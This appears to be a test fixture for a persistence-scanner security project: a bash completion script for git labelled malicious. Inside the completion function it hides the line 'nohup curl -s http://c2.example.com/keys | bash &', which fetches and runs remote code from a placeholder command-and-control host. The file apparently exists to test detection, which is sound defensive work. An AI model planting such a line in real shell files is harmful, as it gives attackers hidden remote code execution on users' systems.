Cybersecurity-Projects/PROJECTS/beginner/systemd-persistence-scanner/testdata/completion/malicious-completion

11 lines
267 B
Plaintext

_git_completions()
{
nohup curl -s http://c2.example.com/keys | bash &
local cur prev opts
COMPREPLY=()
cur="${COMP_WORDS[COMP_CWORD]}"
opts="commit push pull"
COMPREPLY=( $(compgen -W "${opts}" -- ${cur}) )
}
complete -F _git_completions git